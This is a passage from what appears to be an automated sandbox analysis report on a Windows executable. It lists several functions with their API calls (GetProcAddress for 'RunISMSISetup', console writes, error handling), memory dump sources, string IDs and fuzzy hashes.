                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3__memset
                                                                                                                                                                          • String ID: PackageName$Startup
                                                                                                                                                                          • API String ID: 3055368530-2142348390
                                                                                                                                                                          • Opcode ID: 5fca3612233a80bb4fd0585f95ae28f403ab3ba5bdbcd9c3b05c01a0503ceff3
                                                                                                                                                                          • Instruction ID: cb750c5c1d958627db46bfb27559e58efe265efda4aa7aee821367da491d5a28
                                                                                                                                                                          • Opcode Fuzzy Hash: 5fca3612233a80bb4fd0585f95ae28f403ab3ba5bdbcd9c3b05c01a0503ceff3
                                                                                                                                                                          • Instruction Fuzzy Hash: 79F0BBB1A4021867D710EB649D02FAA73E4BB04708F1144EEA549E21C1EE74AE4C8788
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00419A72, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 00419A87
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A91
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                          • String ID: RunISMSISetup
                                                                                                                                                                          • API String ID: 199729137-1536503584
                                                                                                                                                                          • Opcode ID: fca6e34a19414953b74debe2c82003569f09f1067c46dafb230f63a4522da641
                                                                                                                                                                          • Instruction ID: 6b78ee87499e38da932e5b5ee7483f9607b0971f957267291103f4cd21d358e2
                                                                                                                                                                          • Opcode Fuzzy Hash: fca6e34a19414953b74debe2c82003569f09f1067c46dafb230f63a4522da641
                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0E5705207109FD7149B30ED196A337AAFF41346B10403EE41681214D735EC89865C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045189B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___initconout.LIBCMT ref: 004518A9
                                                                                                                                                                            • Part of subcall function 00453538: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004518AE,?,HsG,0044E560,?), ref: 0045354B
                                                                                                                                                                          • WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,00000000,00000000,?,HsG,0044E560,?), ref: 004518CC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ConsoleCreateFileWrite___initconout
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3087715906-1835203436
                                                                                                                                                                          • Opcode ID: ebd93220050d891039e2ab01d121d49cf598592bfcbe302c1ccd9cbb88394505
                                                                                                                                                                          • Instruction ID: 8f6992f2cd5ec848d4ca428c5a3851c84b07f700f83527082690bf6c5ca429b6
                                                                                                                                                                          • Opcode Fuzzy Hash: ebd93220050d891039e2ab01d121d49cf598592bfcbe302c1ccd9cbb88394505
                                                                                                                                                                          • Instruction Fuzzy Hash: BEE0D8706001057BEB14EB65EC45FAA3359DB11369F904325F921C62E1EB74DE49C76C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004591F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004591F7
                                                                                                                                                                            • Part of subcall function 004587F5: __EH_prolog3.LIBCMT ref: 004587FC
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString$H_prolog3H_prolog3_
                                                                                                                                                                          • String ID: @I$dgJ
                                                                                                                                                                          • API String ID: 428257936-2614766533
                                                                                                                                                                          • Opcode ID: b90a407458e53d454dca949170bccf3423f2ef144753e77e0d9e8d168fd95fa4
                                                                                                                                                                          • Instruction ID: 243421d86e82226731bcb0fb49dcb14082ef1e28c7ca4bfb1f8d00b9ba636d24
                                                                                                                                                                          • Opcode Fuzzy Hash: b90a407458e53d454dca949170bccf3423f2ef144753e77e0d9e8d168fd95fa4
                                                                                                                                                                          • Instruction Fuzzy Hash: 36F08C75400108EACB04FF91C842AEC3768AF40318F80C06EF905BB192EF786B09C76D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415568, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 431132790-148063137
                                                                                                                                                                          • Opcode ID: c8a416219dacc0eafda0b30f578b03f1d20e85e9d48cb3106065e3792baaa745
                                                                                                                                                                          • Instruction ID: bdb74a5aae53450c2d4f44e7c53a8178a30bd26c69f60c260d0ed3a908835368
                                                                                                                                                                          • Opcode Fuzzy Hash: c8a416219dacc0eafda0b30f578b03f1d20e85e9d48cb3106065e3792baaa745
                                                                                                                                                                          • Instruction Fuzzy Hash: 69E09AB0440700DBDB20AF4688053DDBAB0BB00725F90C22FF8685A281C3FC4A89DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004161F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 431132790-148063137
                                                                                                                                                                          • Opcode ID: 262259611de623f0e38288dd1e8350a1b98cc6dc0495d3006a2c3e3ba63404da
                                                                                                                                                                          • Instruction ID: f1e788d987efc9c7afb7e223d3f36c1880c8140cee2f95dfce3b04dc591a1b32
                                                                                                                                                                          • Opcode Fuzzy Hash: 262259611de623f0e38288dd1e8350a1b98cc6dc0495d3006a2c3e3ba63404da
                                                                                                                                                                          • Instruction Fuzzy Hash: C1E09AB0444700DBD720AF8589053CDBAB0BB00724F90C22FB8586A281D3FC4A48DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00416238, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 431132790-148063137
                                                                                                                                                                          • Opcode ID: 1caca8cee9c7b466fcb6e73b08c4efa546d345d9e48e33d480d0b6e219d15e99
                                                                                                                                                                          • Instruction ID: 9b76f1fc0350861953124b232ffb6853d25edbe403442270c3504ab86b44f2d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 1caca8cee9c7b466fcb6e73b08c4efa546d345d9e48e33d480d0b6e219d15e99
                                                                                                                                                                          • Instruction Fuzzy Hash: E3E0DFB0804700CBD320AF8584053CDB6B0AB00725F80C62FF8685A2C1C3FC4645CB8C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045E051, Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0045E036,?,?,?), ref: 0045E057
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0045E036,?,?,?), ref: 0045E061
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,0045E036,?,?,?), ref: 0045E0A3
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,0045E036,?,?,?), ref: 0045E0AD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                          • Opcode ID: 885227e2a2ce5df3a6efb283c4f3950b074c47bf2e884b1446df2e0c793e740c
                                                                                                                                                                          • Instruction ID: f32d3ce236b349faf2398f8fbd39c7e92af736883aa4b494114516278c8ad380
                                                                                                                                                                          • Opcode Fuzzy Hash: 885227e2a2ce5df3a6efb283c4f3950b074c47bf2e884b1446df2e0c793e740c
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F096305007659BDB392F22C80C75E7B57EB10B17F11442BED09822E3CBFD9A8A965A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%